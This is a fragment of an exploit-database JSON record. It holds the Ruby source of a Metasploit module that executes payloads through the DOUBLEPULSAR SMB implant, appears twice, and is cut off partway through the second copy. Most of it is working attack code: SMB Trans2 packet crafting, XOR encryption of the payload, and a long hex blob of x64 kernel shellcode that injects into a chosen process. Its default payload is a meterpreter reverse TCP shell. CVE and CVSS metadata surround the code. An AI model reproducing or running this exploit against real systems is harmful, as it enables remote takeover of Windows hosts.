print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-09] #"}, "lastseen": "2021-09-08T22:11:20", "differentElements": ["sourceData"], "edition": 11}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "e57caa717ccad756d6a4a3bac91dd524", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-09T22:14:51", "history": [], "viewCount": 110, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142603", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142602", "PACKETSTORM:156196"]}, {"type": "zdt", "idList": ["1337DAY-ID-27803", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-33313", "1337DAY-ID-27802"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:42030", "EDB-ID:42031", "EDB-ID:47456", "EDB-ID:43970"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96706", "SMNTC-96707", "SMNTC-96709", "SMNTC-96705", "SMNTC-96704"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0148", "MS:CVE-2017-0144"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}], "modified": "2021-09-09T22:14:51", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-09T22:14:51", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n 